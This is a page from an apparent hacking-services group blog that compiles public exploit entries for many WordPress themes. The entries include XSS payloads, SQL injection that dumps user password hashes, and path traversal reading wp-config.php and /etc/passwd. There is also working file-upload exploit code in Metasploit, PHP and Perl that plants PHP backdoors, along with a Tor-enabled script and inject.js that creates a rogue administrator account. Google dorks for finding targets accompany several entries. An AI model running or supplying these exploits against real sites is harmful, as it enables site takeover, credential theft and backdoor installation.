Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863126067

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/49866/info

The Hybrid theme for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to Hybrid theme 0.10 are vulnerable. 

http://www.example.com/?p=8&cpage=[XSS]
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'socket'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
          This module exploits a file upload vulnerability in all versions of the
          Holding Pattern theme found in the upload_file.php script which contains
          no session or file validation. It allows unauthenticated users to upload
          files of any type and subsequently execute PHP scripts in the context of
          the web server.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Alexander Borg',                 # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2015-1172'],
          ['WPVDB', '7784'],
          ['PACKETSTORM', '130282']
        ],
      'DisclosureDate'  => 'Feb 11 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['holding_pattern', {}]],
      'DefaultTarget'   => 0
    ))
  end

  def check
    check_theme_version_from_readme('holding_pattern')
  end

  def rhost
    datastore['RHOST']
  end

  def holding_pattern_uploads_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
  end

  def holding_pattern_uploader_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
  end

  def generate_mime_message(payload, payload_name)
    data = Rex::MIME::Message.new
    target_ip = IPSocket.getaddress(rhost)
    field_name = Rex::Text.md5(target_ip)

    # In versions 1.2 and 1.3 of the theme, the upload directory must
    # be encoded in base64 and sent with the request. To maintain
    # compatibility with the hardcoded path of ../uploads in prior
    # versions, we will send the same path in the request.
    upload_path = Rex::Text.encode_base64('../uploads')

    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
    data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
    data
  end

  def exploit
    print_status("Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
    data = generate_mime_message(payload, payload_name)

    print_status("Uploading payload...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => holding_pattern_uploader_url,
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => data.to_s
    )
    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)

    print_status("Executing the payload at #{payload_url}")
    register_files_for_cleanup(payload_name)
    send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
  end
end
HireHackking 
##################################################################################

# Description : Wordpress Themes GeoPlaces3 - Arbitrary File Upload vulnerbility
# Google Dork: inurl:/wp-content/themes/GeoPlaces3/
# Date: 23 August 2015
# Vendor Homepage: http://templatic.com/app-themes/geo-places-city-directory-wordpress-theme
# Tested on: Win 7 & Win 8.1
# Author: Mdn_Newbie | Gantengers Crew 
# https://forum.gantengers-crew.org/

##################################################################################

Exploit : wp-content/themes/GeoPlaces3/library/includes/upload.php
	  wp-content/themes/GeoPlaces3/library/includes/upload_3feb.php

Path 	: /wp-content/uploads/tmp/


<?php
 
$uploadfile="m.jpg";
$ch = 
curl_init("https://server/wp-content/themes/GeoPlaces3/library/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>



WE ARE : SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php 

GREETS TO: Gantengers Crew - Indonesian Defacer - Indonesian Cyber Army - Defacer Tersakiti Team - Suram Crew - Surabaya BlackHat - AND All Moeslim Defacer
HireHackking 
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A

.:: Theme Description ::.
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your Java Script Codes to Name & Email Fields
Step 3 - Click Post Comment

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145
HireHackking 
source: https://www.securityfocus.com/bid/57676/info

The flashnews Theme for WordPress is prone to multiple input-validation vulnerabilities. 

An attacker may leverage these issues to cause denial-of-service conditions, disclose sensitive information, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg [XSS] 

http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1 

http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 

http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php 

http://www.example.com/wp-content/themes/flashnews/includes/test.php 

http://www.example.com/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/66490/info

The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Felici 1.7 is vulnerable; other versions may also be affected. 

<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
source: https://www.securityfocus.com/bid/49867/info

The F8 Lite theme for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to F8 Lite theme 4.2.2 are vulnerable. 

http://www.example.com/?p=8&s=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/49872/info

The EvoLve theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to EvoLve theme 1.2.6 is vulnerable. 

http://www.example.com?s=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/69672/info

Epic theme for Wordpress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 

http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
HireHackking 
# Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
# Google Dork: "inurl:avia-element-paging"
# Date: 18/10/2021
# Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles
# Vendor Homepage: https://kriesi.at/
# Version: Enfold < 4.8.4 (all versions)
# Tested on: Ubuntu
# CVE : CVE-2021-24719

# Full disclosure and PoC on: https://blog.asturhackers.es/cross-site-scripting-xss-reflejado-en-tema-enfold-4-8-4-para-wordpress

While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string “ProofOfConcept” can be reflected literally  on pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches.

https://[hostname]/[path]?ProofOfConcept --> This URL must include pages shown by Enfold theme

Changing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS)  vulnerability. Find the following URL that includes the malicious payload.

https://[hostname]/[path]/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9j --> This URL must include pages shown by Enfold theme

Payload (double encoded): this payload is double encoded in the URL from:
'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>

Payload (base64): the “atob” payload is Base64 encoded from:
console.log(document.cookie)

Navigating to the crafted URL, the console log displays some cookies that are used by the affected site (i.e. cookies with no “HttpOnly” flag set). However, the payload can be easily configurable.
HireHackking 
source: https://www.securityfocus.com/bid/49869/info

The Elegant Grunge theme for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Elegant Grunge theme 1.0.3 is vulnerable; prior versions may also be affected. 

http://www.example.com/?s=&quot;%20%3e%3c/input%3e%3cScRiPt%3ealert(123)%3c/ScRiPt%3e
HireHackking 
source: https://www.securityfocus.com/bid/67935/info

The Elegance theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
HireHackking 
#########################################################
# Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
# Google dork: inurl:wp-content/themes/DesignFolio-Plus
# Author: CrashBandicot
# Date: 04.03.2015
# Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus
# Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip
# tested on : MsWin32
#########################################################
 
Vulnerable File : upload-file.php
<?php
//Upload Security
$upload_security = md5($_SERVER['SERVER_ADDR']);
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
        $file = $_FILES[$upload_security];
        $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
          
                if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
                        if(chmod($file,0777)):
                            echo "success"; 
                        else:
                                echo "error".$_FILES[$upload_security]['tmp_name'];
                        endif;
                else:
                    echo "error".$_FILES[$upload_security]['tmp_name'];
                endif;
endif;
?>
 
Exploit
 
#!/usr/bin/perl
 
use Digest::MD5 qw(md5 md5_hex);
use MIME::Base64;
use IO::Socket;
use LWP::UserAgent;
 
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
        print "\n\t     ! *** #  ^_^ # *** !\n\t      :p\n\n";
 
$use = "\n\t  [!] ./$0 127.0.0.1 backdoor.php";
 
($target ,$file) = @ARGV;
 
die "$use" unless $ARGV[0] && $ARGV[1];
 
if($target =~ /http:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
 
my $addr = inet_ntoa((gethostbyname($target))[4]);
my $digest = md5_hex($addr);
my $dir = encode_base64('../../../../');
 
my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
$pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
 
__END__
 
 
# File path: http://target/shell.php
HireHackking 
source: https://www.securityfocus.com/bid/56568/info

The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--
HireHackking 
source: https://www.securityfocus.com/bid/63257/info

The Daily Deal theme is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

http://www.example.com/wp-content/themes/DailyDeal/monetize/upload/
HireHackking 
source: https://www.securityfocus.com/bid/56694/info

The CStar Design theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/themes/cstardesign/swf/flashmo/flashmoXML.php?id=[SQL]
HireHackking 
<?php
/**
 * Exploit Titie: Bridge - Creative Multi-Purpose WordPress Theme  Exploit
 * Google Dork:
 * Exploit Author: wp0Day.com <contact@wp0day.com>
 * Vendor Homepage: http://bridge.qodeinteractive.com/
 * Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054
 * Version: 9.1.3
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Stored XSS, Ability to overwrite any theme settings.
 * Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1]
 */


require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();


$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);

if (!$options){
    showHelp();
}

if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}


function logIn(){
    global $curl, $options;
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());


}


function exploit(){
    global $curl, $options;

    switch ($options['m']){
        case 'm' :
                //Maintanence mode
                echo "Putting site in maintenece mode\n";
                $data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes');
                $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
                $resp = $curl->getResponse();
                echo "Response: ".$resp."\n";
            break;
        case 'x' :
                //XSS Mode, create extra admin
                echo "Injecting inject.js \n";
                $data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js"));
                $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
                $resp = $curl->getResponse();
                echo "Response: ".$resp."\n";

            break;
    }



}



logIn();
exploit();


function validateInput($options){

    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) ){
        return false;
    }
    if ( !isset($options['p']) ){
        return false;
    }
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){
        return false;
    }
    $options['tor'] = isset($options['tor']);

    return $options;
}


function showHelp(){
    global $argv;
    $help = <<<EOD

    Bridge Theme Exploit, Stored XSS, Create Admin account.

Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]

       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **

       [TARGET_URL] http://localhost/wordpress/
       [MODE] x - Permanent XSS DEMO, m - Maintenance Mode

Examples:
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m x
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m m

    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License

EOD;
    echo $help."\n\n";
    die();
}

?>
inject.js
});

//Get Token
var domain = location.protocol+'//'+document.domain;
var url = domain+'/wp-admin/user-new.php';
var JQ = jQuery.noConflict();
JQ.ajax({
    "url": url,
    "success" : function(x){
        //Got the response
        console.log('Got response');
        var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g;
        var m = re.exec(x);
        if (m[2].match(/([a-z0-9]{10})/)) {
            var nonce = m[2];
            console.log('Got nonce '+nonce);
        }
        console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin ');
        JQ.ajax({
            "url": url,
            "method" : "POST",
            "data" :
                    { "action":"createuser",
                      "_wpnonce_create-user": nonce,
                      "_wp_http_referer" : "/wp-admin/user-new.php",
                      "user_login": "wp0day_poc",
                      "email" : "contact@wp0day.com",
                      "first_name" : "Exploit",
                      "last_name" : "Poc",
                      "url" : "http://wp0day.com/",
                      "pass1" : "secret",
                      "pass1-text" : "secret",
                      "pass2" : "secret",
                      "send_user_notification" : 0,
                      "role":"administrator",
                      "createuser" : "Add+New+User"
                      },
            "success" : function(x){
                console.log("Register done");
            }
        });

    }
});



$j(document).ready(function(){
HireHackking 
source: https://www.securityfocus.com/bid/49873/info

The Cover WP theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Versions prior to Cover WP theme 1.6.6 are vulnerable. 

http://www.example.com/?s=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/59371/info

The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:

1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 

Content spoofing:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

Cross-site scripting:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
HireHackking 
source: https://www.securityfocus.com/bid/57541/info

The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities.

An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php
HireHackking 
# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
# Google Dork: inurl:/wp-content/themes/CherryFramework
# Date: 2018-11-17
# Exploit Author: b1p0l4r
# Vendor Homepage: http://www.cherryframework.com/
# Software Link: http://www.cherryframework.com/
# Version: 3.x.x > 3.1.4
# Tested on: Ubuntu 18.0.4.1
# CVE : N/A

# The CherryFramework Cherry theme 3.1.4 for WordPress allow
# remote attackers to
# obtain potentially sensitive information via
# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
# because it
# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.

# [PoC]
# just open that files/link and then showing the popup for saving a .ZIP file
# EXAMPLE LINK = 

https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php 

# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team
HireHackking 
source: https://www.securityfocus.com/bid/50527/info

The Bonus theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Bonus 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/?s="><script>alert("3spi0n")</script>
HireHackking 
source: https://www.securityfocus.com/bid/49879/info

The Black-LetterHead theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Black-LetterHead theme 1.5 is vulnerable; prior versions may also be affected. 

http://www.example.com/index.php/%22+%3E%3C/form%3E%3CScRiPt%3Exss=69566599%3C/ScRiPt%3E/t Post Request:s=1&
HireHackking 
* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
 
Description
================================================================================
 The Beauty Premium theme contains a contact form that is vulnerable to CSRF
 and File Upload vulnerability in the sendmail.php file. The file attachment
 gets uploaded to the wordpress upload directory and it is not sanitized,
 allowing attackers to upload harmful code. 
 
 
PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:

<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" />			</li>
</form>

You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
HireHackking 
source: https://www.securityfocus.com/bid/69671/info

Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.

http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php